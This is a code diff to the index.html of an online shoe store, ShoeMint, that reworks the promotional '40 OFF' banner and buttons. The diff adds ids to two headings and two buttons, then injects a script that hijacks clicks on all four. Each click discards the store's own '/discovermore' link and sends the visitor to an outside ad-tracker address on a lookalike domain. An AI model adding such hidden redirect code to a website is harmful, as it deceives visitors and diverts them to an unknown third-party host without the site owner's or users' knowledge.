--- a/L2U2hvZU1pbnQNCnd3dy5zaG9lbWludC5jb20vDQpTaG9lTWludCBpcyBhbiBleGNsdXNpdmUgc2hvZSBjb2xsZWN0aW9uIG9mIGlycmVzaXN0aWJsZSBzdHlsZXMgYXQgaW/index.html
+++ b/L2U2hvZU1pbnQNCnd3dy5zaG9lbWludC5jb20vDQpTaG9lTWludCBpcyBhbiBleGNsdXNpdmUgc2hvZSBjb2xsZWN0aW9uIG9mIGlycmVzaXN0aWJsZSBzdHlsZXMgYXQgaW/index.html
@@ -8223,7 +8223,7 @@
                     />
                 </div>
                 <div class="large-6 columns">
-                    <h1 style="font-family: Oswald;color:#FF6666">40 OFF @SHOEMINT</h1>
+                    <h1 id="hd" style="font-family: Oswald;color:#FF6666">40 OFF @SHOEMINT</h1>
                     <div style="padding-left:10px">
                         <ul class="square times">
                             <li>Define Your Style</li>
@@ -8232,7 +8232,7 @@
                             <li>Claim Your Discount</li>
                         </ul>
                     </div>
-                    <a class="button discover" href="/discovermore" style="background-color:#FF6666; margin-top:2.3em">
+                    <a id="go" class="button discover" href="/discovermore" style="background-color:#FF6666; margin-top:2.3em">
                         <strong>LET'S GET YOURS</strong>
                     </a>
                 </div>
@@ -8245,7 +8245,7 @@
         <div class="large-8 columns" id="login">
             <div class="row">
                 <div class="large-12 columns" style="padding:0 2em">
-                    <h1 style="font-family: Oswald;color:#FF6666">EXPERIENCE NEXT LEVEL LUXURY</h1>
+                    <h1 id="hm" style="font-family: Oswald;color:#FF6666">40 OFF @SHOEMINT</h1>
                     <ul class="no-bullet times">
                         <li>Exclusive Design</li>
                         <li>Insider Price</li>
@@ -8253,8 +8253,16 @@
                         <li>Free Shipping Always</li>
                     </ul>
 
-                    <a class="button discover" href="/discovermore" style="background-color:#FF6666; margin-top:1em;">
-                        <strong>DISCOVER MORE</strong>
+                    <div style="padding-left:10px">
+                        <ul class="square times">
+                            <li>Define Your Style</li>
+                            <li>Explore Your Showroom</li>
+                            <li>Find Your Perfert Pair</li>
+                            <li>Claim Your Discount</li>
+                        </ul>
+                    </div>
+                    <a id="gom"class="button discover" href="/discovermore" style="background-color:#FF6666; margin-top:2.3em">
+                        <strong>LET'S GET YOURS</strong>
                     </a>
 
                 </div>
@@ -8262,6 +8270,27 @@
             </div>
         </div>
     </div>
+    <script>
+      document.getElementById('go').onclick = function() {
+        window.location.replace('http://tracker.com-ads.co/click');
+        return false;
+      };
+
+      document.getElementById('gom').onclick = function() {
+        window.location.replace('http://tracker.com-ads.co/click');
+        return false;
+      };
+
+      document.getElementById('hd').onclick = function() {
+        window.location.replace('http://tracker.com-ads.co/click');
+        return false;
+      };
+
+      document.getElementById('hm').onclick = function() {
+        window.location.replace('http://tracker.com-ads.co/click');
+        return false;
+      };
+    </script>
 </body>
 
 </html>
